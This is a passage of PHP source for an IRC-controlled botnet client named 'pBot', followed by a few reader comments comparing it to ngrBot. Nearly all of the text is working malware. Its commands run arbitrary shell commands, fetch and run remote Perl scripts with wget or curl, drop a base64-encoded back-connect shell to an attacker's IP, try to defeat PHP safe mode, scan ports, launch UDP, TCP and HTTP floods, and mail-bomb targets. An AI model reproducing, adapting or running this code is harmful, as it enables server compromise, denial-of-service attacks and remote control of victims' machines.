}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PART":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PRIVMSG":
if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) )
{
if( $this->is_authed( $host ) == false )
{
switch( substr( $mcmd[ 0 ], 1 ) )
{
case "login":
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
$this->privmsg( $this->get_chan( ),"3" . "4[2$nick2 has successfully logged in.]3" );
}
else
{
$this->privmsg( $this->get_chan( ), "3" . "4[Failed login by 2$nick2.]3" );
}
break;
}
}
}
else
{
switch(substr($mcmd[0],1))
{
case "exec":
{
if( !$this->is_safe( ) )
{
$command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$returndata = $this->ex( $command );
if( !empty( $returndata ) )
{
$this->privmsg( $this->get_chan( ), "[2EXEC2] ".$returndata );
}
}
break;
}
case "info":
{
$safemode = "on";
if( !$this->is_safe( ) )
{
$safemode = "off";
}
$this->privmsg( $this->get_chan( ), "[2INFO2] ".php_uname( ).' ( SAFE: '.$safemode.' )' );
break;
}
case "safe":
{
$safemode = "on";
if( !$this->is_safe( ) )
{
$safemode = "off";
}
$this->privmsg( $this->get_chan( ), "[2SAFE2] ".$safemode );
break;
}
case "uname":
{
$this->privmsg( $this->get_chan( ), "[2UNAME2] ".php_uname( ) );
break;
}
case "dropperl":
{
if( $this->is_safe( ) )
{
$this->privmsg( $this->get_chan( ), "[2DROP-PERL2] Safe mode is ON" );
break;
}
$perl_file = $mcmd[1];
if( !empty( $perl_file ) )
{
$parsed_url = $this->parse_url_s( $perl_file );
$new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ].$parsed_url[ 'dir' ].'/';
$new_local = $parsed_url[ 'file' ];
$file_type = $parsed_url[ 'file_ext' ];
$this->ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
$this->ex('cd /tmp;rm -rf *'.$file_type.'**');
$this->ex('cd /dev/shm;rm -rf *'.$file_type.'**');
$this->privmsg( $this->get_chan( ), "[2EXEC-PERL2] Executed file ".$new_remote.$new_local );
break;
}
$this->privmsg( $this->get_chan( ), "[2EXEC-PERL2] Failure executing ".$perl_file );
break;
}
case "ip":
{
$this->privmsg( $this->get_chan( ), "[2IP2] ".$_SERVER['SERVER_ADDR'] );
break;
}
case "execrfi":
{
$fileUrl = $mcmd[1];
if( !empty( $fileUrl ) )
{
$urli = parse_url( $fileUrl );
if( !empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) )
{
$fp = fsockopen( $urli['host'], 80, $errno, $errstr, 5 );
if( $fp )
{
$out = "GET /".$urli['path'].$urli['query']." HTTP/1.1rn";
$out .= "Host: ".$urli['host']."rn";
$out .= "Keep-Alive: 300rn";
$out .= "Connection: keep-alivernrn";
fwrite( $fp, $out );
$get_data = '';
while(!feof($fp))
{ $get_data .= fgets( $fp, 256 ); }
$this->privmsg( $this->get_chan( ), "[2EXEC-RFI2] Executed file ".$fileUrl );
break;
}
}
}
$this->privmsg( $this->get_chan( ), "[2EXEC-RFI2] Failure executing ".$fileUrl );
break;
}
case "base64":
{
$str_ed = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
switch( $mcmd[1] )
{
case "encode":
{
$this->privmsg( $this->get_chan( ), "[2BASE642] encode [ " .$str_ed." -> ".base64_encode($str_ed)."2]" );
break;
}
case "decode":
{
$this->privmsg( $this->get_chan( ), "[2BASE642] decode [ ".$str_ed." -> ".base64_decode($str_ed)."2]" );
break;
}
}
break;
}
case "md5":
{
$str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$this->privmsg( $this->get_chan( ), "[2MD52] [ ".$str_md5." -> ".md5($str_md5)."]" );
break;
}
case "dns":
{
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1])
&& is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->get_chan( ),"[2DNS2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->get_chan( ),"[2DNS2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
}
case "die":
{
$this->send( "QUIT :DIE command from ".$nick );
fclose( $this->conn );
exit( );
break;
}
case "restart":
{
$this->privmsg( $this->get_chan( ), "[2RESTART2] executed by [".$nick."]" );
$this->send( "QUIT :Restart command from ".$nick );
fclose( $this->conn );
$this->start();
break;
}
case "breaksafe":
{
if( $this->is_safe( ) )
{
ini_restore( "safe_mode" );
ini_restore( "open_basedir" );
}
$safemode = "on";
if( !$this->is_safe( ) )
{
$safemode = "off";
$this->set_nick();
}
$this->privmsg( $this->get_chan( ), "[2SAFE2] ".$safemode );
}
case "moveserver":
{
if( count( $mcmd ) > 3 )
{
$server = $mcmd[1];
$port = $mcmd[2];
$channel = $mcmd[3];
$key = $mcmd[4];
if( $this->using_encode )
{
$this->config[ 'server' ] = base64_encode( $server );
$this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) );
$this->config[ 'key' ] = base64_encode( $key );
}
else
{
$this->config[ 'server' ] = $server;
$this->config[ 'chan' ] = str_replace( "#", "", $channel );
$this->config[ 'key' ] = $key;
}
$this->config[ 'port' ] = $port;
$this->privmsg( $this->get_chan( ), "[2MOVESERVER2] ".$server." => ".$port." => ".$channel." => ".$key );
$this->send( "QUIT :Moveserver command from ".$nick );
fclose( $this->conn );
$this->start();
}
break;
}
case "whois":
{
$param2 = $mcmd[1];
if( !empty( $param2 ) )
{
//do it
//http://ws.arin.net/whois/?queryinput=127.0.0.1
$fp = fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /whois/?queryinput=$param2 HTTP/1.1rn";
$out .= "Host: ws.arin.netrn";
$out .= "Keep-Alive: 300rn";
$out .= "Connection: keep-alivernrn";
fwrite( $fp, $out );
$whodata = '';
while(!feof($fp))
{
/*do nothing*/
$whodata .= fread( $fp, 1024 );
}
$explk = explode( "<div id="content">", $whodata );
$explk = explode( "</div>", $explk[1] );
$htmldat = strip_tags( $explk[0] );
fclose( $fp );
$this->privmsg( $this->get_chan( ), "[2WHOIS2] $htmldat" );
}
else
{
$this->privmsg( $this->get_chan( ), "[2WHOIS2] Error: $errstr" );
}
}
else
{
$this->privmsg( $this->get_chan( ), "[2WHOIS2] Invalid params, use .whois <ip/host>" );
}
break;
}
case "upftp":
{
//ftp://user:password@host.com
$pftp = parse_url( $mcmd[1] );
$file = $mcmd[2];
$dest = $mcmd[3];
if( empty( $pftp[ 'host' ] )
|| empty( $pftp[ 'user' ] )
|| empty( $pftp[ 'pass' ] )
|| empty( $file )
|| empty( $dest ) )
{
$this->privmsg( $this->get_chan( ), "[2UPFTP2] URL line invalid!" );
}
else
{
$conn_id = ftp_connect( $pftp[ 'host' ] );
$login_result = ftp_login( $conn_id, $pftp[ 'user' ], $pftp[ 'pass' ] );
if( ( !$conn_id ) || ( !$login_result ) )
{
$this->privmsg( $this->get_chan( ), "[2UPFTP2] FTP connection failed!" );
}
else
{
$this->privmsg( $this->get_chan( ), "[2UPFTP2] Connected to ".$pftp[ 'host' ]." for user ".$pftp[ 'user' ] );
$upload = ftp_put( $conn_id, $dest, $file, FTP_BINARY );
if( !$upload )
{
$this->privmsg( $this->get_chan( ), "[2UPFTP2] FTP upload faled!" );
}
else
{
$this->privmsg( $this->get_chan( ), "[2UPFTP2] FTP upload success!" );
$this->privmsg( $this->get_chan( ), "[2UPFTP2] Uploaded '".$file."' to '".$dest."'" );
}
}
}
break;
}
case "join":
{
$channel = $mcmd[1];
$key = $mcmd[2];
$this->privmsg( $this->get_chan( ), "[2JOIN2] ".$channel." => ".$key );
$this->join( $channel, $key );
break;
}
case "part":
{
$this->privmsg( $this->get_chan( ), "[2PART2] ".$mcmd[1] );
$this->send( "PART ".$mcmd[1] );
break;
}
case "vuln":
{
$server_name = $_SERVER['SERVER_NAME'];
$req_uri = $_SERVER['REQUEST_URI'];
if( $server_name != "localhost" && $server_name != "127.0.0.1" )
{
if( strlen( $server_name ) && strlen( $req_uri ) )
{
$vuln = "http://".$server_name.$req_uri;
$this->privmsg( $this->get_chan( ), "[2VULN2] ".$vuln );
}
}
break;
}
case "download":
{
if( count( $mcmd ) > 2 )
{
if( !$fp = fopen( $mcmd[ 2 ], "w" ) )
{
$this->privmsg( $this->get_chan( ), "[2DOWNLOAD2] Permission denied!" );
}
else
{
if( !$get = file( $mcmd[ 1 ] ) )
{
$this->privmsg( $this->get_chan( ), "[2DOWNLOAD2] Download failed!" );
}
else
{
for( $i=0; $i <= count( $get ); $i++ )
{
fwrite( $fp, $get[ $i ] );
}
$this->privmsg( $this->get_chan( ),"[2DOWNLOAD2] URL [".$mcmd[ 1 ]."] to [".$mcmd[ 2 ]."]");
}
fclose( $fp );
}
}
else
{
$this->privmsg( $this->get_chan( ), "[2DOWNLOAD2] Invalid Parameters, idiot!" );
}
break;
}
case "privmsg":
{
$person = $mcmd[1];
$text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
$this->privmsg( $this->get_chan( ), "[2PRIVMSG2] ".$person." => ".$text );
$this->privmsg( $person, $text );
break;
}
case "pscan":
{
$host = $mcmd[1];
$beginport = $mcmd[2];
$endport = $mcmd[3];
$open_ports = "Open Port List for ".$host.": ";
for($i = $beginport; $i < $endport; $i++)
{
if( $this->scanport( $host, $i ) )
{
$open_ports .= "|".$i;
}
}
$this->privmsg( $this->get_chan( ), $open_ports );
break;
}
case "software":
{
$this->privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] );
break;
}
case "bomb":
{
if(count($mcmd) > 5)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[5]),$header))
{
$this->privmsg( $this->get_chan( ),"[2MAIL2]: Unable to send email.");
}
else
{
$mbomb = 1;
while($mbomb <= $mcmd[4])
{
mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$this->privmsg( $this->get_chan( ),"[2MAIL2]:2 Sent3"."4 $mcmd[4] 3Emails to 3"."4$mcmd[1]3 From: 3"."4$mcmd[2]3 Subject: 3"."4$mcmd[3]3 2");
}
}
}
break;
}
case "snf":
{
$this->config[ 'nickform' ] = $mcmd[ 1 ];
$this->privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]."2]" );
break;
}
case "randnick":
{
$this->set_nick();
break;
}
case "logout":
{
$this->remove_auth( $host );
$this->privmsg( $this->get_chan( ),"3" . "4[2$nick2 has successfully logged out.]3");
break;
}
case "ver":
case "ver":
{
$this->privmsg( $this->get_chan( ),"pBot mod by fantasize & jester.");
break;
}
case "status":
{
$this->privmsg( $this->get_chan( ),"[2BOT2]: Ready and Accepting Commands");
break;
}
case "urlbomb":
{
$this->urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] );
break;
}
case "udpflood":
{
if( count( $mcmd ) > 3 )
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
}
case "raw":
{
$this->send(strstr($msg,$mcmd[1]));
break;
}
case "conback":
{
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
}
case "tcpflood":
{
if( count( $mcmd ) > 5 )
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
case "diesafe";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
fclose($this->conn);
exit;
}
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function scanport( $host, $port )
{
if( fsockopen( $host, $port, $e, $s ) )
{
return 1;
}
return 0;
}
function urlbomb( $host, $path, $times, $mode = 0 )
{
if( !isset( $host ) || !isset( $path ) || !isset( $times ) )
return;
$this->privmsg( $this->get_chan( ), "[2URLBOMB2] started! [ ".$host."/".$path."2]" );
$success = 0;
for( $i = 0; $i < $times; $i++ )
{
$fp = fsockopen( $host, 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /".$path." HTTP/1.1rn";
$out .= "Host: ".$host."rn";
$out .= "Keep-Alive: 300rn";
$out .= "Connection: keep-alivernrn";
fwrite( $fp, $out );
if( $mode != 0 )
{
while(!feof($fp)){/*do nothing*/}
}
fclose( $fp );
$success++;
}
}
$this->privmsg( $this->get_chan( ), "[2URLBOMB2] finished! [ ".$host."/".$path."2][ Success: ".$success."2]");
}
function udpflood( $host, $packetsize, $time )
{
$this->privmsg( $this->get_chan( ),"[3" . "4[2UDP2]Attacking $host with $packetsize kb packets for $time seconds3]" );
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time)
{
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg( $this->get_chan( ),"[3" . "4[2UDP2]Finished flooding $host - Sent $env MB at $vel MB/s3]");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg( $this->get_chan( ),"[2TCP-Flood Started!2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg( $this->get_chan( ),"[2TCP-Flood2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg( $this->get_chan( ),"[2TCP-Flood Finished!2]: Config - $packets for $host:$port.");
}
function send($msg)
{
fwrite($this->conn,"$msgrn");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function set_nick()
{
if( !$this->is_safe( ) )
{
$prefix .= "[`]";
}
else
{
$prefix .= "[S]";
}
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
$this->nick = sprintf( $prefix.$this->config[ 'nickform' ], $random_number );
$this->send("NICK ".$this->nick);
}
function parse_url_s( $url )
{
$URLpcs = ( parse_url( $url ) );
$PathPcs = explode( "/", $URLpcs['path'] );
$URLpcs['file'] = end( $PathPcs );
unset( $PathPcs[ key( $PathPcs ) ] );
$URLpcs['dir'] = implode("/",$PathPcs);
$fileext = explode( '.', $URLpcs['file'] );
if(count($fileext))
{
$URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
}
return ($URLpcs);
}
function conback($ip,$port)
{
$this->privmsg( $this->get_chan( ),"[2CONBACK2]: Opening back-connect to $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIHN5c3RlbSgidW5zZXQgSElTVEZJTEU7IHVuc2V0IFNBVkVISVNUO2VjaG8gLS09PVN5c3RlbWluZm89PS0tOyB1bmFtZSAtYTtlY2hvOw0KICBlY2hvIC0tPT1Vc2VyaW5mbz09LS07IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLTsgcHdkO2VjaG87IGVjaG8gLS09PVNoZWxsPT0tLSAiKTsNCiAgc3lzdGVtKCRzeXN0ZW0pOw0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0NCnByaW50ICJbKl0gRGF0YWNoZWRcblxuIjs=";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl"))
{
unlink("/tmp/dc.pl");
}
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl"))
{
unlink("/var/tmp/dc.pl");
}
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl"))
{
unlink("dc.pl");
}
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
$bot = new pBot;
$bot->start();
?>
U still belive that ngrBot is made from scratch ? lol
ScotZ - November 22, 2011 at 12:19 am
oh dear,
never new fubar was still at the fub0ts he only use to use the rfi's for ddos
-scotz 😉 ryan1918.com
Anonymous - June 23, 2012 at 10:42 pm
nGrb0t is made using a base and a program to create different builds. Of course it's not directly made from scratch.